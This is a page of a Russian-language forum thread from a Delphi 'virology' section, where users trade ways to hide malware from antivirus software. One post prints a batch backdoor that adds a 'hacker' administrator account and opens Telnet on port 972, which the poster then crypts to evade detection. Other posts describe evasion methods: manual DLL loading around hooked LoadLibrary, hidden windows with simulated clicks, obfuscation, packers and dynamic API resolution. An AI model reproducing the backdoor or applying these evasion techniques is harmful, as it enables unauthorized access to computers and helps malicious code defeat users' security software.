Среда, 22.11.2017, 08:16 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 2 из 2«12
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Способы сокрытия от антивирусов (Скрыться от антивируса)
Способы сокрытия от антивирусов
Волк-1024Дата: Пятница, 30.12.2011, 01:05 | Сообщение # 26
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Вроде. Замусоривание кода уже сейчас не канает. АВ строит логику приложения и если там очень много бесполезных прыжков и тому подобное. Она может наоборот насторожиться. Хотя могу тоже ошибаться. )

Лучше использовать комбинацию: Фейковые API + Динамич. получение функций + их шифрование.

---------------------------------------
Ой, фигню сморозил. Шифрование и дин. получ. функ несовместимы. Совместимы если только искать по имени функции, а не по хэшу.


Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Пятница, 30.12.2011, 01:12
 
AndroidДата: Понедельник, 02.01.2012, 14:29 | Сообщение # 27
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
Ребята, а вы точно на Делфи пишете??? Может кто-то из вас смотрел в сторону KOL - довольно маленькие прогарммки получаются и кстати, стем же набором функций что и VCL палятся значительно меньше почему-то...
 
dolphinДата: Понедельник, 02.01.2012, 17:37 | Сообщение # 28
Администратор
Сообщений: 902
Статус: Offline
Так кол это же объектная библиотека а вирусам это зачем? Если только как альтернатива vcl. В троянце например ,если нужна визуалка, можно и на апи написать, в этом сложного особо нет. Так что happy . А не палится потому что мало используют для вирусных целей.

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик


Сообщение отредактировал dolphin - Понедельник, 02.01.2012, 18:29
 
phlДата: Среда, 04.01.2012, 04:24 | Сообщение # 29
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
А у меня вопрос насчёт криптора, проводил я недавно эксперимент,для него использовал антивирусник drweb, вот код батника открывающего телнет на 972 порту:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Антивирусник сразу видит в нём вирус bat.Adduser.43, далее преобразую файл из bat в exe, с помощью программы bat to exe converter и криптую, всё
если проверить файл антивирусником вирус не определяется, думал отлично, но стоит запустить файл и он тут же блокируется и опять выдаёт вирус bat.Adduser.43, хотел бы узнать в чём здесь причина и реально ли это обойти
криптор и вирус во вложении
Прикрепления: 4718817.rar(48Kb) · telnet.bat(0Kb)
 
phlДата: Воскресенье, 08.01.2012, 01:32 | Сообщение # 30
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
а уже сам понял, антивирус само добавление нового пользователя в систему с админскими правами и открытие порта воспринимает как подозрительное действие, другой вирус криптовал, норм, не палится
 
Волк-1024Дата: Вторник, 10.01.2012, 23:57 | Сообщение # 31
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Крипт не поможет. Ибо прога не конвертирует из bat в exe, а просто суёт bat в ресурсы exe файла. И при запуске извлекает и запускает его. 80% того, что bat файл после запуска можно обнаружить в темповой папке (если в бат не самоудалиться). Я не знаю как в bat to exe converter, но в Quick Batch File Compiler так всё и происходит. (((

P.S. лучше батник зашифровать, чем экзешник.


Pascal, C\C++, Assembler, Python
 
kalinochkindДата: Среда, 11.01.2012, 19:22 | Сообщение # 32
Новичок
Зарегистрирован: 12.12.2011
Группа: Пользователи
Сообщений: 3
Статус: Offline
Можно пробовать Themidу...
 
XSPYДата: Среда, 11.01.2012, 19:57 | Сообщение # 33
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
если много подозрительных мест,то это не насторожит антивири,у которых нет "оценки опасности" программы.Хотя тогда у них юзаеться нечто другое.Например,в Авире проверяються состояния флагов и т.п,импорт,секии данных и прочее....
а вообще,стоить нуно и криптовать приложение так,как нравиться аверу.


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
phlДата: Воскресенье, 29.01.2012, 21:59 | Сообщение # 34
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
от антивирусов то как-нибудь можно спрятаться,но как обойти файрвол?
 
Волк-1024Дата: Воскресенье, 29.01.2012, 22:51 | Сообщение # 35
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Для каждего фаера свои методы...

Pascal, C\C++, Assembler, Python
 
vvova15Дата: Понедельник, 30.01.2012, 17:17 | Сообщение # 36
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
есть еще метод сырой загрузки dll.
суть заключается в том , чтобы вручную загрузить dll в адресное пространство, открыв длл-ку как бинарный файл, считав из pe-заголовка сколько нужно памяти, выделить ее,, загрузить туда заголовки и секции(простым компированием памяти), обработать релоки, распарсить таблицу импорта, найти в ней адрес нужной функции, и т.д.
в общем написать свои аналоги loadlibrary и getprocadress
ведь авири хукают loadlibrary из kernel32.dll и мы тем самым обойдем это и вызовем функцию незаметно для авиря.
проверял на vt - палева вообще 0
да и врятли такое будет палиться, хотя если только если ав будут хукать createfile после этого и если это длл-ка, то орать.
но мы тогда сделаем чтение файла через ioctl запросы к диску и парсинг mft(master file table) biggrin

вот статейка, кому интересно http://slesh.name/?act=articles&subact=show&nid=12



ICQ 185-398


Сообщение отредактировал vvova15 - Понедельник, 30.01.2012, 17:18
 
vvova15Дата: Вторник, 31.01.2012, 10:19 | Сообщение # 37
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
да и еще метод:
создать окно за пределами экрана, кнопку на нем , написать обработчик, чтоб по клику на нее делалось палевное действие, и посылать сообщение о кликепо этой кнопке.
ведь авири наиболее подозрительно относятся к программам "без окон без дверей", которые работают не спрашивая юзера ни о чем. а так как бэ все честно, юзер сам кликнул по кнопке и авири пока не палят этот метод.
+ кончено же обфускация))(открытие несуществующих файлов между строками нужного кода, проверка невыполнимых условий, высов функций, которые что-то там делают полезное и т.д. )



ICQ 185-398


Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 10:19
 
Волк-1024Дата: Вторник, 31.01.2012, 14:52 | Сообщение # 38
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Quote
создать окно за пределами экрана,

А не лучше ли так:
Code
Form1.Visible:=false;
?

И выйдет зверь размером в over 400кб crazy


Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Вторник, 31.01.2012, 14:59
 
vvova15Дата: Вторник, 31.01.2012, 16:29 | Сообщение # 39
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
Quote
Form1.Visible:=false;

нет. http://msdn.microsoft.com/en-us/library/windows/desktop/ms632679 (v=vs.85).aspx
создаешь и регистрируешь класс окна, создаешь окно и описываешь цикл обработки сообщений
x и y в параметрах указываешь отриуательные или over 9000



ICQ 185-398


Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 16:30
 
xXxSh@dowxXxДата: Понедельник, 06.02.2012, 17:01 | Сообщение # 40
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (Волк-1024)
Form1.Visible:=false;


...да согласен с "vvova15",ведь форма все равно остается видимой даже если Вы выставляете значение Visible:=false;
 
Волк-1024Дата: Понедельник, 06.02.2012, 17:25 | Сообщение # 41
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
xXxSh@dowxXx Ну или так
Code
CreateWindowEx(0, PChar('Win'), PChar('WinMin'), 0, X, Y, Width, Height, 0,  0, Hinstance, nil);
- Без разницы.

Окно будет формально создано.


Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Понедельник, 06.02.2012, 17:37
 
delfcode » Delphi » Вирусология Delphi » Способы сокрытия от антивирусов (Скрыться от антивируса)
Страница 2 из 2«12
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz